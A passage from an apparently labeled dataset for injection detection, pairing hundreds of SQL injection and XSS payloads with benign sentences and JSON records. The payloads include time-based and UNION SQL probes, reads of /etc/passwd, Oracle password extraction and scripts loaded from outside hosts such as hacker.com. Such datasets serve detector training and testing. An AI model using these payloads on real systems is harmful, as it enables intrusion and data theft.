SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))",2,SQLi,11060 "1'+ ( select 'zohk' where 5502 = 5502 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,11960 "&lt;META HTTP-EQUIV=\""Set-Cookie\"" Content=\""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\""&gt;",1,XSS,1448 "1%"" or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,18219 "1"" or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,19804 <body onafterprint=alert(1)>,1,XSS,9614 "1' where 7080 = 7080 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,15880 "1 ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12152 "AND ELT(1337=1337,SLEEP(5))--",2,SQLi,20674 "1, ( select ( case when ( 2970 = 5830 ) then 1 else 2970* ( select 2970 from mysql.db ) end ) )",2,SQLi,14403 "<IMG SRC=""jav&#x0D;ascript:alert('XSS');"">",1,XSS,7312 "<A href=""javascript%26colon;confirm()"">click",1,XSS,7037 "{""id"":null,""firstName"":""Buddhika"",""lastName"":""Hong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27429 "<progress draggable=""true"" ondragleave=""alert(1)"">test</progress>",1,XSS,2839 "1%' ) ) ) union all select null,null,null--",2,SQLi,19224 <br onfocusout=alert(1) tabindex=1 id=x></br><input autofocus>,1,XSS,3220 "1%"" ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11348 -8463 ) ) ) or 4861 = 9834#,2,SQLi,20934 AND 1=0,2,SQLi,22528 Select your verify.,3,normal,25001 "<title onkeyup=""alert(1)"" contenteditable>test</title>",1,XSS,4697 "<code onkeyup=""alert(1)"" contenteditable>test</code>",1,XSS,5243 "1', ( select ( case when ( 9644 = 9644 ) then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 ) else 1/ ( select 0 from dual ) end ) from dual )",2,SQLi,11569 Carefully select the items.,3,normal,24479 1' ) as wpmv where 1479 = 1479 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9974 "<;A HREF="";http://google.com/"";>;XSS<;/A>;",1,XSS,7341 "1"" ) where 5719 = 5719 rlike sleep ( 5 ) --",2,SQLi,19245 Let's decide where to go for a relaxing weekend.,3,normal,23727 <iframe onpointerleave=alert(1)>XSS</iframe>,1,XSS,6809 "{""id"":null,""firstName"":""Anthony"",""lastName"":""Chern"",""address"":""70 W Main St"",""city"":""421"",""telephone"":""2073564752""}",3,normal,26943 Randomly select food.,3,normal,24822 "<pre draggable=""true"" ondragleave=""alert(1)"">test</pre>",1,XSS,4484 "1 ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( 1402 = 1402",2,SQLi,10439 1 ) and 2457 = 8146,2,SQLi,21953 Select charm.,3,normal,24730 "<bdi draggable=""true"" ondragstart=""alert(1)"">test</bdi>",1,XSS,4485 "end and ""xouo"" like ""xouo",2,SQLi,21054 1' ) as inid where 7812 = 7812 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,15249 "<nav onclick=""alert(1)"">test</nav>",1,XSS,9183 Fetch information where valid.,3,normal,23303 "admin' and substring(password/text(),1,1)='7",2,SQLi,19066 "1' ) ) as sxpk where 5524 = 5524 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10548 Select hide.,3,normal,24693 <keygen onpointerover=alert(1)>XSS</keygen>,1,XSS,7237 select * from users where id = '1' * ( \ ) or 1 = 1 -- 1',2,SQLi,17465 "<svg draggable=""true"" ondragleave=""alert(1)"">test</svg>",1,XSS,4610 ) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337,2,SQLi,16908 They select the best.,3,normal,24445 -8341 or 8571 = 8571--,2,SQLi,21407 "<bdo onclick=""alert(1)"">test</bdo>",1,XSS,9196 Where's the missing piece of artwork?,3,normal,22755 "))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,19448 "1'+ ( select 'rguk' where 6019 = 6019 union all select null,null,null,null,null--",2,SQLi,15144 "1%' ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( '%' = '",2,SQLi,12902 "-5231%"" or 4945 = 8402#",2,SQLi,21363 Select mug.,3,normal,24529 "<div draggable=""true"" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select>",1,XSS,1076 1 ) ) as muyz where 6105 = 6105,2,SQLi,20403 "1',extractvalue ( 9788,concat ( 0x5c,0x7171706a71, ( select ( elt ( 9788 = 9788,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,13841 "1"" ) and 6565 = 2647 and ( ""mrge"" like ""mrge",2,SQLi,19105 "<div draggable=""true"" contenteditable>drag me</div><menuitem ondragover=alert(1) contenteditable>drop here</menuitem>",1,XSS,779 "and 1 = ( if ( ( load_file ( char ( 110,46,101,120,11 ...",2,SQLi,17468 """)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,19936 <object data=javascript:alert(1)>,1,XSS,9389 <keygen id=x onfocus=alert(1)>,1,XSS,9556 "1%"" ) union all select null,null,null#",2,SQLi,19761 "end and ( ( ( ""revx"" = ""revx",2,SQLi,20818 "Up to 35% off select washing machines, ovens, and more",3,normal,25217 "1%' ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( '%' = '",2,SQLi,12622 <script>location.protocol='javascript'</script>,1,XSS,6085 1 ) where 3671 = 3671,2,SQLi,21707 "1'|| ( select 'eayf' where 5431 = 5431 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) ) ||'",2,SQLi,11470 "-5054%"" ) ) ) union all select 8263,8263,8263,8263--",2,SQLi,18236 "1%' ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( '%' = '",2,SQLi,13137 "<td draggable=""true"" ondrag=""alert(1)"">test</td>",1,XSS,5892 <dt onpointerup=alert(1)>XSS</dt>,1,XSS,9382 "1' ) where 2802 = 2802 union all select null,null,null#",2,SQLi,17838 <p onpointerenter=alert(1)>XSS</p>,1,XSS,9190 "-4764"" ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""dfvz"" like ""dfvz",2,SQLi,10498 "<IMG SRC='vbscript:msgbox(""XSS"")'>",1,XSS,9159 "<colgroup onmouseover=""alert(1)"">test</colgroup>",1,XSS,6007 "<style>:target {transform: rotate(180deg);}</style><acronym id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></acronym>",1,XSS,567 "<fieldset onmousemove=""alert(1)"">test</fieldset>",1,XSS,5901 """ or sleep ( __TIME__ ) #",2,SQLi,21044 "1 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13897 "<style>:target {color: red;}</style><source id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></source>",1,XSS,842 "<listing onkeyup=""alert(1)"" contenteditable>test</listing>",1,XSS,3890 "x=alert,x(1)",1,XSS,9837 "<main onmouseleave=""alert(1)"">test</main>",1,XSS,7644 For control select a disinfectant with proven activity against Salmonella.,3,normal,26184 "<IMG SRC=x oncanplaythrough=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2668 Determine conditions where needed.,3,normal,23283 "That way, you can select a studio that is quiet and won't be over-stimulating for your newborn.",3,normal,25494 "1 ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 4048 = 4048",2,SQLi,12358 "<IMG SRC=""javascript:alert('');"">",1,XSS,9344 Select your develop.,3,normal,25036 "<code draggable=""true"" ondragenter=""alert(1)"">test</code>",1,XSS,4094 "-5174' ) ) ) or make_set ( 9515 = 7938,7938 ) and ( ( ( 'ygee' = 'ygee",2,SQLi,16182 "1"" ) where 1614 = 1614 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12695 "<div draggable=""true"" contenteditable>drag me</div><blockquote ondrop=alert(1) contenteditable>drop here</blockquote>",1,XSS,767 "1' ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 'ibav' = 'ibav",2,SQLi,11367 "-9156' ) ) union all select 9110,9110,9110,9110#",2,SQLi,18695 "1%"" ) ) union all select null--",2,SQLi,20423 1%' ) ) ) and 2006 = 2006,2,SQLi,21065 Samsung EVO Select microSDXC (512 GB) — £86.49 (list price £126.99),3,normal,25736 "<script>alert(String.fromCharCode(88,83,83))</script>",1,XSS,4867 -1277' ) ) ) order by 1--,2,SQLi,21053 <meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus>,1,XSS,2622 "1"" ) as nfpe where 2679 = 2679",2,SQLi,20578 "<listing ondblclick=""alert(1)"">test</listing>",1,XSS,6712 "<isindex draggable=""true"" ondragstart=""alert(1)"">test</isindex>",1,XSS,3028 "1 ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17312 <tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot>,1,XSS,4104 1 ) as tbve where 4828 = 4828,2,SQLi,20712 "1'+ ( select gajr where 6653 = 6653 union all select null,null,null,null#",2,SQLi,15855 "<a href=""\xE2\x80\x84javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2024 Where's your SQL assistance?,3,normal,23413 <input autofocus onblur=alert(1)>,1,XSS,9388 "<blockquote onkeypress=""alert(1)"" contenteditable>test</blockquote>",1,XSS,2687 Select the right solution for the puzzle.,3,normal,24152 "javascript:alert();//<img src=x:x onerror=alert(1)>\"";alert();//"";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--",1,XSS,73 "<style>:target {color:red;}</style><output id=x style=""transition:color 1s"" ontransitionend=alert(1)></output>",1,XSS,1027 "1 ) ) as hpxw where 1826 = 1826 union all select null,null,null,null,null,null,null,null#",2,SQLi,14738 "1' ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( 'nsji' = 'nsji",2,SQLi,12775 "1%' ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13932 "<div draggable=""true"" contenteditable>drag me</div><ins ondragover=alert(1) contenteditable>drop here</ins>",1,XSS,1191 1' and sleep ( 5 ),2,SQLi,22052 "1%"" ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11714 <svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus>,1,XSS,3501 "-3632' or make_set ( 9354 = 9354,7185 ) and 'lgpy' like 'lgpy",2,SQLi,17075 -5742' where 1314 = 1314 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12815 "<EMBED SRC=""http://hacker.com/xss.swf"" AllowScriptAccess=""always"">",1,XSS,2711 "1"" ) as xioc where 7260 = 7260 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16488 "<nextid draggable=""true"" ondrag=""alert(1)"">test</nextid>",1,XSS,4244 "<meta/content=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==""http-equiv=refresh>",1,XSS,1361 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ( ""oiuw"" = ""oiuw",2,SQLi,12955 "?alert(1)"",",1,XSS,9843 1 ) as tngy where 8956 = 8956 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,14130 "-1083%"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( ""%"" = """,2,SQLi,17287 "<div id=""95""><svg xmlns=""http://www.w3.org/2000/svg"" xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,1580 -9340 ) where 5462 = 5462 or 3038 = 3038,2,SQLi,19520 "<html onMouseEnter html onMouseEnter=""javascript:parent.javascript:alert(1)""></html onMouseEnter>",1,XSS,1511 Where's the best place to capture nature's beauty?,3,normal,23895 -6865 ) or ( 8459 = 8459 ) *4906 and ( 6107 = 6107,2,SQLi,18433 "1%"" ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ""%"" = """,2,SQLi,12804 <animatemotion onpointerdown=alert(1)>XSS</animatemotion>,1,XSS,4114 "1 union all select null,null--",2,SQLi,20598 select ( case when ( 3435 = 4011 ) then 1 else 3435* ( select 3435 from master..sysdatabases ) end ) --,2,SQLi,13966 "<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>",1,XSS,1847 "1'+ ( select jqyo where 4426 = 4426 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) +'",2,SQLi,12267 "1"" ) as nqtn where 5606 = 5606 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12423 "<keygen onclick=""alert(1)"">test</keygen>",1,XSS,7841 <canvas onpointerleave=alert(1)>XSS</canvas>,1,XSS,6966 -7773' or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,13793 select ( case when ( 1499 = 4923 ) then 1499 else 1/ ( select 0 ) end ) --,2,SQLi,15724 "1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) -- bqxe",2,SQLi,12026 "<header onkeyup=""alert(1)"" contenteditable>test</header>",1,XSS,4334 Merge the data tables for a comprehensive view.,3,normal,22927 "1%' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( '%' = '",2,SQLi,11702 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,18252 "<div style=""width: expression(document.vulnerable=true;);"">",1,XSS,3616 "setTimeout(function() {window.location.href = 'https://example.com';}, 3000); ",1,XSS,2110 "1"" ) where 5698 = 5698 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14433 "union select 1,load_file('/etc/passwd'),1,1,1;",2,SQLi,18900 "1' ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 'javh' = 'javh",2,SQLi,10802 "<label ondblclick=""alert(1)"">test</label>",1,XSS,7776 Select make.,3,normal,24569 Order a pepperoni pizza.,3,normal,22610 "1%"" ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ""%"" = """,2,SQLi,12912 `'><script>\xE2\x80\x86javascript:alert(1)</script>,1,XSS,5325 ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,17120 "-1168 ) ) as vlol where 3475 = 3475 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11375 "<label draggable=""true"" ondragend=""alert(1)"">test</label>",1,XSS,4185 "-2925%"" or make_set ( 9354 = 9354,7185 ) and ""%"" = """,2,SQLi,18176 The Hilton Honors Aspire Card comes with Priority Pass Select membership.,3,normal,25435 "Roebuck, the Radical member for Sheffield, gave notice that he would move for a select committee "" to inquire into the condition of our army before Sevastopol, and into the conduct of those departments of the government whose duty it has been to minister to the wants of that army.""",3,normal,25745 -4023 or ( 8779 = 5716 ) *5716,2,SQLi,20548 "<;!--#exec cmd="";/bin/echo ';<;SCRIPT SRC';"";-->;<;!--#exec cmd="";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';"";-->;",1,XSS,638 "<LAYER SRC=""%(scriptlet)s""></LAYER>",1,XSS,8986 "1%' union all select null,null,null--",2,SQLi,19857 "<button oncopy=""alert(1)"" contenteditable>test</button>",1,XSS,4514 "<style>:target {color:red;}</style><xss id=x style=""transition:color 1s"" ontransitionstart=alert(1)></xss>",1,XSS,1195 "<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();",1,XSS,47 Select the right path for your path.,3,normal,24229 "1' where 7125 = 7125 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,17384 1'+ ( select qdon where 9453 = 9453,2,SQLi,20028 "1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'novq' = 'novq",2,SQLi,13890 "<IMG SRC=\""jav&#x09;ascript:alert('XSS');\"">",1,XSS,6789 "/</title/'/</style/</script/--><p"" onclick=alert()//>*/alert()/*",1,XSS,2965 %3Cx onxxx=alert(1),1,XSS,9779 Plant a beautiful rose.,3,normal,22687 "<main draggable=""true"" ondragend=""alert(1)"">test</main>",1,XSS,4517 <script>alert('XSS')</script>,1,XSS,9584 "select * from generate_series ( 3827,3827,case when ( 3827 = 7095 ) then 1 else 0 end ) limit 1--",2,SQLi,14291 "We write;L 22 = a 1 a 2 .b 1 n-2 b2s 3 n - 3 3 n-3 3 n-3 3 a 3 = a 1 a 2 .b 1 b 2 .c 1 c2, and so on whenever we require to represent a product of real coefficients symbolically; we then have a one-to-one correspondence between the products of real coefficients and their symbolic forms. If we have a function of degree s in the coefficients, we may select any s sets of umbrae for use, and having made a selection we may when only one quantic is under consideration at any time permute the sets of umbrae in any manner without altering the real significance of the symbolism.",3,normal,25175 "perl -e 'print \""&lt;IMG SRC=java\0script&#058;alert(\\""XSS\\"")&gt;\"";' &gt; out",1,XSS,1977 "admin"" or 1=1#",2,SQLi,22182 "{""id"":null,""firstName"":""Ben"",""lastName"":""Chia"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26858 "1"" ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( ""staz"" like ""staz",2,SQLi,12627 "1' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'opll' like 'opll",2,SQLi,11930 "<strike onmousemove=""alert(1)"">test</strike>",1,XSS,6892 ORDER BY 4#,2,SQLi,22362 Select minimize.,3,normal,24627 1 ) where 2083 = 2083,2,SQLi,21660 -8131' ) ) or 9680 = 3467,2,SQLi,21063 "1' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( 'zurf' = 'zurf",2,SQLi,14936 1' and 9970 = 3409,2,SQLi,22050 "<style>@keyframes slidein {}</style><pre style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></pre>",1,XSS,434 "<q onbeforepaste=""alert(1)"" contenteditable>test</q>",1,XSS,5169 Merely taking a median at each pixel will preferentially select values from certain frames.,3,normal,25882 "<style>@keyframes x{}</style><b style=""animation-name:x"" onanimationend=""alert(1)""></b>",1,XSS,1834 "1 ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15954 schema,3,normal,23177 1'+ ( select rhlb where 9477 = 9477,2,SQLi,20068 "-8838"" ) ) as xisn where 2749 = 2749 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,10288 "javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/""/'/*--><frame onload=alert()><svg/\""/*<svg onload=' /**/-alert()//'>javascript:/*`/*\""/*'/*</noembed>""/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//>",1,XSS,39 "1' or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and 'obax' like 'obax",2,SQLi,14598 if ( 8812 = 7896 ) select 8812 else drop function xltk--,2,SQLi,17728 "{""id"":null,""name"":""choice""}",3,normal,26921 1 where 2060 = 2060,2,SQLi,21939 "<ruby onkeypress=""alert(1)"" contenteditable>test</ruby>",1,XSS,4595 "<div id=""119""><iframe src=""view-source:http://www.example.org/"" frameborder=""0"" style=""width:400px;height:180px""></iframe>",1,XSS,715 "<style>:target {transform: rotate(180deg);}</style><details id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></details>",1,XSS,561 select ( case when ( 2352 = 8672 ) then 2352 else 2352* ( select 2352 from information_schema.character_sets ) end ) #,2,SQLi,13278 "1"" ) ) as xcyo where 2929 = 2929",2,SQLi,20320 "<STYLE>BODY{-moz-binding:url(""http://xss.rocks/xssmoz.xml#xss"")}</STYLE>",1,XSS,2337 "1"" ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ""diiv"" = ""diiv",2,SQLi,13115 "<data onkeypress=""alert(1)"" contenteditable>test</data>",1,XSS,4539 "-7333%"" ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""%"" = """,2,SQLi,12636 Create a lasting memory.,3,normal,22604 <noscript onpointerdown=alert(1)>XSS</noscript>,1,XSS,6133 "<select onmouseover=""alert(1)"">test</select>",1,XSS,7005 "1', ( select ( case when ( 4209 = 5879 ) then 1 else 4209* ( select 4209 from information_schema.character_sets ) end ) )",2,SQLi,13116 select pg_sleep ( 5 ),2,SQLi,21687 "1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""lgwe"" like ""lgwe",2,SQLi,10461 "1' ) ) union all select null,null,null,null,null#",2,SQLi,18599 <track onpointerleave=alert(1)>XSS</track>,1,XSS,7435 1' and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and 'pziy' = 'pziy,2,SQLi,13041 "-8069 ) ) as sxbn where 7689 = 7689 union all select 7689,7689,7689,7689,7689,7689,7689,7689,7689,7689--",2,SQLi,13903 "<nextid draggable=""true"" ondragend=""alert(1)"">test</nextid>",1,XSS,3749 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,11624 "<style>@keyframes x{}</style><ruby style=""animation-name:x"" onanimationstart=""alert(1)""></ruby>",1,XSS,1599 "-7579%"" or 6570 = 1764",2,SQLi,21519 "It really will improve your ability to select the right collocation, I promise!",3,normal,25960 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#",2,SQLi,14665 "-3593%' union all select 6346,6346,6346,6346,6346,6346--",2,SQLi,17641 "-9445 ) as dmur where 4371 = 4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#",2,SQLi,14104 <tt onpointerup=alert(1)>XSS</tt>,1,XSS,9375 "{""id"":null,""name"":""definition""}",3,normal,27036 "1%' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17496 "<label onkeydown=""alert(1)"" contenteditable>test</label>",1,XSS,4304 "<details draggable=""true"" ondragstart=""alert(1)"">test</details>",1,XSS,3008 %20or%201=1,2,SQLi,22346 "1 ) ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13309 "For example, if you tap to select one part of a home address, Android will automatically select the entire thing, as well as suggest pasting the text into the Maps app.",3,normal,26183 1%' rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,17033 <dl id=x tabindex=1 onfocus=alert(1)></dl>,1,XSS,7526 `'><script>\xC2\x85javascript:alert(525)</script>,1,XSS,5832 "How to select all the photos in a folder or on your iPhoneThere is no ""Select All"" command in the Photos app, but you can select all the photos in a folder (or even all photos on an iPhone) in a slightly more manual way.1.",3,normal,26080 "1"" ) ) ) union all select null,null,null#",2,SQLi,19400 "<object data=""http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"">?",1,XSS,1561 "1 ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( 8898 = 8898",2,SQLi,13337 "1 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13552 "-6815 ) where 2498 = 2498 union all select 2498,2498,2498,2498,2498--",2,SQLi,16334 "select * from users where id = 1 or "" ( ."" or 1 = 1 -- 1",2,SQLi,17574 or sleep ( __TIME__ ) = ',2,SQLi,21040 "><script+src=http://search.twitter.com/trends.json?callback=alert()""></script>",1,XSS,2109 Select bloom.,3,normal,24679 Select lead.,3,normal,24662 "1' ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'dgwe' like 'dgwe",2,SQLi,11902 "{""id"":null,""firstName"":""Nurul"",""lastName"":""Atiqah"",""address"":""1 Washington St"",""city"":""301"",""telephone"":""5440129179""}",3,normal,27277 1 ) where 6116 = 6116 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10471 "1'+ ( select dgnt where 4701 = 4701 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12585 "1'+ ( select papc where 8900 = 8900 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,15887 1 and ( 5369 = 8325 ) *8325# psze,2,SQLi,20217 "1 ) ) and 8312 = 